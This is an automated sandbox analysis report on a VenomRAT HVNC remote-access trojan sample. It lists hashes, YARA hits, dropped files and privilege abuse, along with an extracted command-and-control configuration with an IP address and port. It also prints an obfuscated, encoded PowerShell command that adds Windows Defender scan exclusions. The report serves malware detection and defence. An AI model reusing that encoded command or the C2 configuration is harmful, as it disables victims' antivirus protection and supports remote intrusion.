Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
30s -
max time network
39s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
30/07/2023, 18:57
Behavioral task
behavioral1
Sample
vnm/7z.exe
Resource
win10v2004-20230703-en
Behavioral task
behavioral2
Sample
vnm/Plugins/Keylogger.exe
Resource
win10v2004-20230703-en
Behavioral task
behavioral3
Sample
vnm/Stub/Client.exe
Resource
win10v2004-20230703-en
Behavioral task
behavioral4
Sample
vnm/Stub/client.exe
Resource
win10v2004-20230703-en
Behavioral task
behavioral5
Sample
vnm/VenomRAT_HVNC.exe
Resource
win10v2004-20230703-en
Behavioral task
behavioral6
Sample
vnm/client.exe
Resource
win10v2004-20230703-en
General
-
Target
vnm/VenomRAT_HVNC.exe
-
Size
16.8MB
-
MD5
d8291744ad4573fbc0c2f82b1ada7bec
-
SHA1
94960ccdc763248cb03e29d3f7b5ac5e20c7c501
-
SHA256
69821fd27dd83d225fc21c799b8223d416985ad4a3bb5e78586b6d319e77f351
-
SHA512
30f2110a990a541bc64b065b9615581356bdd682765e813d9b0bf32d68cd7dd559498a4e719085b514b7258380681eb7d1789ce2879973f45e18c2050b1266ce
-
SSDEEP
393216:0nu7cCgkszHR7G6lrbkDlyoB+Lj19TRA282+yKGoAZGPcFl:0rDhG61qyoBY7q282+JPA4E
Malware Config
Extracted
asyncrat
VenomRAT_HVNC 5.0.4
ctovnm
85.31.45.6:4444
OWAsgnAMn
-
delay
0
-
install
true
-
install_file
VenomStartup.exe
-
install_folder
%AppData%
Signatures
-
Async RAT payload 8 IoCs
resource yara_rule behavioral5/files/0x0009000000023043-149.dat asyncrat behavioral5/files/0x0009000000023043-160.dat asyncrat behavioral5/files/0x000a0000000231dd-169.dat asyncrat behavioral5/files/0x000a0000000231dd-170.dat asyncrat behavioral5/files/0x000a0000000231dd-164.dat asyncrat behavioral5/files/0x0009000000023043-172.dat asyncrat behavioral5/memory/1212-173-0x0000000000070000-0x0000000000086000-memory.dmp asyncrat behavioral5/memory/4140-178-0x0000000000190000-0x000000000122A000-memory.dmp asyncrat -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\Control Panel\International\Geo\Nation VenomRAT_HVNC.exe -
Executes dropped EXE 2 IoCs
pid Process 4140 VenomRAT_HVNC.exe 1212 vnm.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\vnm.exe VenomRAT_HVNC.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 4628 4140 WerFault.exe 88 4372 1212 WerFault.exe 89 -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4780 powershell.exe 4780 powershell.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
description pid Process Token: SeDebugPrivilege 4780 powershell.exe Token: SeIncreaseQuotaPrivilege 1212 vnm.exe Token: SeSecurityPrivilege 1212 vnm.exe Token: SeTakeOwnershipPrivilege 1212 vnm.exe Token: SeLoadDriverPrivilege 1212 vnm.exe Token: SeSystemProfilePrivilege 1212 vnm.exe Token: SeSystemtimePrivilege 1212 vnm.exe Token: SeProfSingleProcessPrivilege 1212 vnm.exe Token: SeIncBasePriorityPrivilege 1212 vnm.exe Token: SeCreatePagefilePrivilege 1212 vnm.exe Token: SeBackupPrivilege 1212 vnm.exe Token: SeRestorePrivilege 1212 vnm.exe Token: SeShutdownPrivilege 1212 vnm.exe Token: SeDebugPrivilege 1212 vnm.exe Token: SeSystemEnvironmentPrivilege 1212 vnm.exe Token: SeRemoteShutdownPrivilege 1212 vnm.exe Token: SeUndockPrivilege 1212 vnm.exe Token: SeManageVolumePrivilege 1212 vnm.exe Token: 33 1212 vnm.exe Token: 34 1212 vnm.exe Token: 35 1212 vnm.exe Token: 36 1212 vnm.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 3872 wrote to memory of 4780 3872 VenomRAT_HVNC.exe 86 PID 3872 wrote to memory of 4780 3872 VenomRAT_HVNC.exe 86 PID 3872 wrote to memory of 4140 3872 VenomRAT_HVNC.exe 88 PID 3872 wrote to memory of 4140 3872 VenomRAT_HVNC.exe 88 PID 3872 wrote to memory of 4140 3872 VenomRAT_HVNC.exe 88 PID 3872 wrote to memory of 1212 3872 VenomRAT_HVNC.exe 89 PID 3872 wrote to memory of 1212 3872 VenomRAT_HVNC.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\vnm\VenomRAT_HVNC.exe"C:\Users\Admin\AppData\Local\Temp\vnm\VenomRAT_HVNC.exe"1⤵
- Checks computer location settings
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3872 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZQBmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAYwB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAeABoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAcgBsACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4780
-
-
C:\Users\Admin\AppData\Local\Temp\VenomRAT_HVNC.exe"C:\Users\Admin\AppData\Local\Temp\VenomRAT_HVNC.exe"2⤵
- Executes dropped EXE
PID:4140 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 10563⤵
- Program crash
PID:4628
-
-
-
C:\Windows\vnm.exe"C:\Windows\vnm.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1212 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1212 -s 11483⤵
- Program crash
PID:4372
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4140 -ip 41401⤵PID:2296
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 488 -p 1212 -ip 12121⤵PID:3848
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
16.6MB
MD55384c0396589430eeb3d1a2e05703e9a
SHA120da44da7639bbef2f6b5bfc21df7474cd1109af
SHA256b4250aff983f1f588593baed1adb4797e6c1ab6225595ebd013b50348a57a459
SHA5129bf613ee62b0e56af500dd88f572b2221ad6df63b0b4c0dcb0ef763efcebeac633a95f10dfce90f6cff038df2810681dd55dcdd272eb9f907c670cc2e4f7363a
-
Filesize
16.6MB
MD55384c0396589430eeb3d1a2e05703e9a
SHA120da44da7639bbef2f6b5bfc21df7474cd1109af
SHA256b4250aff983f1f588593baed1adb4797e6c1ab6225595ebd013b50348a57a459
SHA5129bf613ee62b0e56af500dd88f572b2221ad6df63b0b4c0dcb0ef763efcebeac633a95f10dfce90f6cff038df2810681dd55dcdd272eb9f907c670cc2e4f7363a
-
Filesize
16.6MB
MD55384c0396589430eeb3d1a2e05703e9a
SHA120da44da7639bbef2f6b5bfc21df7474cd1109af
SHA256b4250aff983f1f588593baed1adb4797e6c1ab6225595ebd013b50348a57a459
SHA5129bf613ee62b0e56af500dd88f572b2221ad6df63b0b4c0dcb0ef763efcebeac633a95f10dfce90f6cff038df2810681dd55dcdd272eb9f907c670cc2e4f7363a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
65KB
MD5ab28aa2b77bf291b81076ce783489391
SHA1aa0218f9cd0361792c3810bdae345f4128ada396
SHA256cd6e2c8f97e768be2d21a0ad0af35317a682f4aba4ba8d6f62d94aba745da45d
SHA512dc791aabade2518012d7f6ea76518eda96e311cb2dbe10695f263e6720fd5f9f55503c200336bec17490e06565e65b3c910bd808e7027358f79edc79277fe0cc
-
Filesize
65KB
MD5ab28aa2b77bf291b81076ce783489391
SHA1aa0218f9cd0361792c3810bdae345f4128ada396
SHA256cd6e2c8f97e768be2d21a0ad0af35317a682f4aba4ba8d6f62d94aba745da45d
SHA512dc791aabade2518012d7f6ea76518eda96e311cb2dbe10695f263e6720fd5f9f55503c200336bec17490e06565e65b3c910bd808e7027358f79edc79277fe0cc
-
Filesize
65KB
MD5ab28aa2b77bf291b81076ce783489391
SHA1aa0218f9cd0361792c3810bdae345f4128ada396
SHA256cd6e2c8f97e768be2d21a0ad0af35317a682f4aba4ba8d6f62d94aba745da45d
SHA512dc791aabade2518012d7f6ea76518eda96e311cb2dbe10695f263e6720fd5f9f55503c200336bec17490e06565e65b3c910bd808e7027358f79edc79277fe0cc